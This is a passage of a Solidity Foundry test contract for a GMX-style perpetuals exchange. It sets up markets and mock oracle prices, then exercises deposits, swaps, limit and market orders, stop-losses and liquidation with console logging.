_dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, false), 5e29);\\n _dataStore.setUint(Keys.fundingExponentFactorKey(_marketProps1.marketToken), 1.1e30); // 2 in 30 decimals like a square, cube, etc\\n _dataStore.setUint(Keys.fundingFactorKey(_marketProps1.marketToken), 0.0000001e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, true), 0.87e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, false), 0.96e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, true), 2.1e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, false), 2.3e30);\\n _dataStore.setUint(Keys.positionImpactExponentFactorKey(_marketProps1.marketToken), 2e30);\\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, true), 5e22); \\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, false), 1e23);\\n\\n // set the limit of market tokens\\n\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, _marketPropsCwnt.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, _marketPropsCwnt.shortToken), 1000e18);\\n \\n \\n // set max open interest for each market\\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, true), 1e39); // 1B $ \\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, false), 1e39); // 1B $\\n\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, true), 10**29); // maxPnlFactor = 10% for long\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, false), 10**29); // maxPnlFactor = 10% for short\\n // _dataStore.setBool(Keys.cancelDepositFeatureDisabledKey(address(_depositHandler)), true);\\n _dataStore.setBool(Keys.cancelOrderFeatureDisabledKey(address(_orderHandler), uint256(Order.OrderType.MarketIncrease)), true);\\n\\n addFourSigners();\\n address(_wnt).call{value: 10000e18}("""");\\n depositor1 = address(0x801);\\n depositor2 = address(0x802);\\n depositor3 = address(0x803);\\n\\n // make sure each depositor has some tokens.\\n _wnt.transfer(depositor1, 1000e18);\\n _wnt.transfer(depositor2, 1000e18);\\n _wnt.transfer(depositor3, 1000e18); \\n _usdc.transfer(depositor1, 1000e18);\\n _usdc.transfer(depositor2, 1000e18);\\n _usdc.transfer(depositor3, 1000e18);\\n _tokenA.transfer(depositor1, 1000e18);\\n _tokenB.transfer(depositor1, 1000e18);\\n _tokenC.transfer(depositor1, 1000e18); \\n\\n printAllTokens(); \\n }\\n\\n error Unauthorized(string);\\n // error Error(string);\\n\\n\\nfunction testLimit() public{\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(""Experiment 1 is completed.""); \\n \\n // console2.log(""PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP"");\\n \\n key = createMarketSwapOrder(depositor1, address(_wnt), 1e15); // create a deposit at block 3 which is within range (2, 6) \\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(""Experiment 2 is completed.""); \\n \\n\\n console2.log(""\\n\\n depositor 1 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1001e30, 106000000000000, true); // \\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(""Experiment 3 is completed.""); \\n \\n \\n\\n console2.log(""\\n\\n depositor 2 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 13e30, 101000000000000, false); // 110 usdc as collateral\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(""Experiment 4 is completed.""); \\n \\n\\n\\n console2.log(""PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP"");\\n vm.warp(2 days);\\n setIndexTokenPrice(priceParams, 98, 100); // send 20e18 USDC, increase $13.123 in a long position with trigger price 101\\n key = createLimitIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 23e18, 1.1234567e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""Experiment 5 is completed.\\n""); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n /*\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(""Experiment 7 for is completed.""); \\n */\\n}\\n\\nfunction testMarketDecrease() public{\\n \\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(""Experiment 1 is completed.""); \\n \\n \\n \\n \\n console2.log(""\\n\\n depositor 2 deposit into marketProps1"");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(""Experiment 2 is completed.""); \\n \\n \\n console2.log(""\\n\\n depositor 1 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1e25, 106000000000000, true); // \\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(""Experiment 3 is completed.""); \\n \\n \\n\\n console2.log(""\\n\\n depositor 2 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 1e25, 101000000000000, false); // 110 usdc as collateral\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(""Experiment 4 is completed.""); \\n \\n console2.log(""********************************************"");\\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 70000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(""a market desced order created with key: "");\\n console2.logBytes32(key);\\n console2.log(""\\nExecuting the order// rest of code""); \\n setIndexTokenPrice(priceParams, 60, 65); // we have a profit for a short position\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(""Experiment 5 is completed.""); \\n\\n printAllTokens();\\n} \\n\\n \\n\\nfunction testLiquidation() public{\\n // blockrange (2, 6)\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(""Experiment 1 is completed.""); \\n \\n \\n \\n \\n console2.log(""\\n\\n depositor 2 deposit into marketProps1"");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(""Experiment 2 is completed.""); \\n \\n \\n console2.log(""\\n\\n depositor 1 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 10e18, 1e25, 106000000000000, true);\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(""Experiment 3 is completed.""); \\n \\n \\n\\n console2.log(""\\n\\n depositor 2 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 100e18, 1e25, 101000000000000, false);\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(""Experiment 4 is completed.""); \\n \\n \\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 106000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(""a market desced order created with key: "");\\n console2.logBytes32(key);\\n console2.log(""\\nExecuting the order// rest of code""); \\n setIndexTokenPrice(priceParams, 84, 90);\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(""Experiment 5 is completed.""); \\n \\n \\n\\n \\n // depositor3 will execute a LimitIncrease Order now\\n key = createMarketIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 20e18, 200e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""Experiment 6 is completed.\\n""); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(""Experiment 7 for is completed.""); \\n \\n // depositor3 creates a stopLossDecrease order\\n setIndexTokenPrice(priceParams, 97, 99);\\n key = createStopLossDecrease(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 95000000000000, 92000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(""a StopLossDecrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n // Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams);\\n console2.log(""Experiment 8 is completed.""); \\n \\n \\n console2.log(""\\n\\n*************************************************\\n\\n"");\\n\\n\\n // depositor3 creates a Liquidation order\\n setIndexTokenPrice(priceParams, 75, 75);\\n console2.log(""Liquidate a position// rest of code"");\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n _liquidationHandler.executeLiquidation(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true, priceParams);\\n console2.log(""Experiment 9 is completed.""); \\n \\n\\n // printPoolsAmounts();\\n printAllTokens();\\n\\n \\n \\n \\n}\\n\\nfunction printAllTokens() startedCompleted(""printAllTokens"") public\\n{\\n console2.log(""\\nTokens used in this test:"");\\n console2.log(""_wnt: ""); console2.logAddress(address(_wnt));\\n console2.log(""_usdc: ""); console2.logAddress(address(_usdc));\\n console2.log(""_sol: ""); console2.logAddress(address(_sol));\\n console2.log(""_tokenA: ""); console2.logAddress(address(_tokenA));\\n console2.log(""_tokenB: ""); console2.logAddress(address(_tokenB));\\n console2.log(""_tokenC: ""); console2.logAddress(address(_tokenC));\\n console2.logString(""test contract address:""); console2.logAddress(address(this));\\n \\n console2.log(""_marketProps1 market token: ""); console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(""_marketPropsAB market token: ""); console2.logAddress(address(_marketPropsAB.marketToken));\\n console2.log(""_marketPropsBC market token: ""); console2.logAddress(address(_marketPropsBC.marketToken));\\n console2.log(""_marketProps1Cwnt market token: ""); console2.logAddress(address(_marketPropsCwnt.marketToken));\\n console2.log(""\\n"");\\n \\n \\n}\\n\\n\\nfunction printMarketTokenAmount() public \\n{ console2.log(""Market token address: "");\\n console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(""depositor1 market token amount: %d"", IERC20(_marketProps1.marketToken).balanceOf(depositor1));\\n console2.log(""depositor2 market token amount: %d"", IERC20(_marketProps1.marketToken).balanceOf(depositor2));\\n console2.log(""depositor3 market token amount: %d"", IERC20(_marketProps1.marketToken).balanceOf(depositor3));\\n}\\n\\nfunction printLongShortTokens(address account) public\\n{\\n console2.log(""balance for ""); console2.logAddress(account);\\n console2.log(""_wnt balance:"", _wnt.balanceOf(account));\\n console2.log(""usdc balance:"", _usdc.balanceOf(account));\\n}\\n\\n\\n\\n\\nfunction addFourSigners() private {\\n _oracleStore.addSigner(address(901));\\n _oracleStore.addSigner(address(902)); \\n _oracleStore.addSigner(address(903)); \\n _oracleStore.addSigner(address(904)); \\n}\\n\\n\\nfunction setIndexTokenPrice(OracleUtils.SetPricesParams memory priceParams, uint256 minP, uint256 maxP) public\\n{\\n uint256 mask1 = ~uint256(type(uint96).max); // (32*3 of 1's)\\n console2.logBytes32(bytes32(mask1));\\n\\n uint256 minPrice = minP;\\n minPrice = minPrice << 32 | minP;\\n minPrice = minPrice << 32 | minP;\\n\\n uint256 maxPrice = maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n\\n priceParams.compactedMinPrices[0] = (priceParams.compactedMinPrices[0] & mask1) | minPrice;\\n priceParams.compactedMaxPrices[0] = (priceParams.compactedMaxPrices[0] & mask1) | maxPrice;\\n}\\n\\n\\nfunction createSetPricesParams() public returns (OracleUtils.SetPricesParams memory) {\\n uint256 signerInfo = 3; // signer 904\\n signerInfo = signerInfo << 16 | 2; // signer 903\\n signerInfo = signerInfo << 16 | 1; // signer 902\\n signerInfo = signerInfo << 16 | 3; // number of singers\\n // will read out as 902, 903, 904 from the lowest first\\n\\n // the number of tokens, 6\\n address[] memory tokens = new address[](6);\\n tokens[0] = address(_sol);\\n tokens[1] = address(_wnt);\\n tokens[2] = address(_usdc);\\n tokens[3] = address(_tokenA);\\n tokens[4] = address(_tokenB);\\n tokens[5] = address(_tokenC);\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedMinOracleBlockNumbers = new uint256[](2);\\n compactedMinOracleBlockNumbers[0] = block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n\\n compactedMinOracleBlockNumbers[1] = block.number+1;\\n compactedMinOracleBlockNumbers[1] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n \\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n \\n uint256[] memory compactedMaxOracleBlockNumbers = new uint256[](2);\\n compactedMaxOracleBlockNumbers[0] = block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n\\n compactedMaxOracleBlockNumbers[1] = block.number+5; \\n compactedMaxOracleBlockNumbers[1] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedOracleTimestamps = new uint256[](2);\\n compactedOracleTimestamps[0] = 9;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 8;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n \\n compactedOracleTimestamps[1] = 9;\\n compactedOracleTimestamps[1] = compactedOracleTimestamps[0] << 64 | 8;\\n \\n\\n // must be equal to the number of tokens, 8 for each, so 8*6= 48, only need one element\\n uint256[] memory compactedDecimals = new uint256[](1);\\n compactedDecimals[0] = 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 100 101 102\\n // wnt: 200 201 203\\n // USDC 1 1 1\\n // tokenA 100 101 102\\n // tokenB 200 202 204\\n // tokenC 400 404 408\\n\\n uint256[] memory compactedMinPrices = new uint256[](3);\\n compactedMinPrices[2] = 408; \\n compactedMinPrices[2] = compactedMinPrices[2] << 32 | 404;\\n\\n compactedMinPrices[1] = 400;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 204;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 202;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 200;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 102;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 101;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 100;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 1;\\n \\n compactedMinPrices[0] = 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 203;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 201;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 200;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 102;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 101;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 100;\\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMinPricesIndexes = new uint256[](1);\\n compactedMinPricesIndexes[0] = 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 105 106 107\\n // wnt: 205 206 208\\n // USDC 1 1 1\\n // tokenA 105 106 107\\n // tokenB 205 207 209\\n // tokenC 405 409 413\\n uint256[] memory compactedMaxPrices = new uint256[](3);\\n compactedMaxPrices[2] = 413;\\n compactedMaxPrices[2] = compactedMaxPrices[2] << 32 | 409;\\n \\n compactedMaxPrices[1] = 405;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 209;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 207;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 205;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 107;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 106;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 105;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 1;\\n\\n compactedMaxPrices[0] = 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 208;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 206; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 205; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 107;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 106;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 105;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMaxPricesIndexes = new uint256[](1);\\n compactedMaxPricesIndexes[0] = 1; \\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n \\n // 3 signers and 6 tokens, so we need 3*6 signatures\\n bytes[] memory signatures = new bytes[](18);\\n for(uint i; i<18; i++){\\n signatures[i] = abi.encode(""SIGNATURE"");\\n }\\n address[] memory priceFeedTokens;\\n\\n OracleUtils.SetPricesParams memory priceParams = OracleUtils.SetPricesParams(\\n signerInfo,\\n tokens,\\n compactedMinOracleBlockNumbers,\\n compactedMaxOracleBlockNumbers,\\n compactedOracleTimestamps,\\n compactedDecimals,\\n compactedMinPrices, \\n compactedMinPricesIndexes,\\n compactedMaxPrices, \\n compactedMaxPricesIndexes, \\n signatures, \\n priceFeedTokens\\n );\\n return priceParams;\\n}\\n\\n/* \\n* The current index token price (85, 90), a trader sets a trigger price to 100 and then acceptabiel price to 95.\\n* He like to long the index token. \\n* 1. Pick the primary price 90 since we long, so choose the max\\n* 2. Make sure 90 < 100, and pick (90, 100) as the custom price since we long\\n* 3. Choose price 95 since 95 is within the range, and it is the highest acceptible price. Choosing 90 \\n* will be in favor of the trader\\n* \\n*/\\n\\nfunction createMarketSwapOrder(address account, address inputToken, uint256 inAmount) public returns(bytes32)\\n{ \\n address[] memory swapPath = new address[](1);\\n swapPath[0] = _marketProps1.marketToken;\\n // swapPath[0] = _marketPropsAB.marketToken;\\n // swapPath[1] = _marketPropsBC.marketToken;\\n // swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account; // the account is the receiver\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = account; // set myself as the ui receiver\\n // params.addresses.market = marketToken;\\n params.addresses.initialCollateralToken = inputToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n // params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n params.numbers.initialCollateralDeltaAmount = inAmount ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(inputToken).transfer(address(_orderVault), inAmount); // this is the real amount\\n\\n\\n // params.numbers.triggerPrice = triggerPrice;\\n // params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n // params.numbers.initialCollateralDeltaAmount = inAmount;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketSwap;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n // params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n}\\n\\n\\n\\nfunction createLiquidationOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory 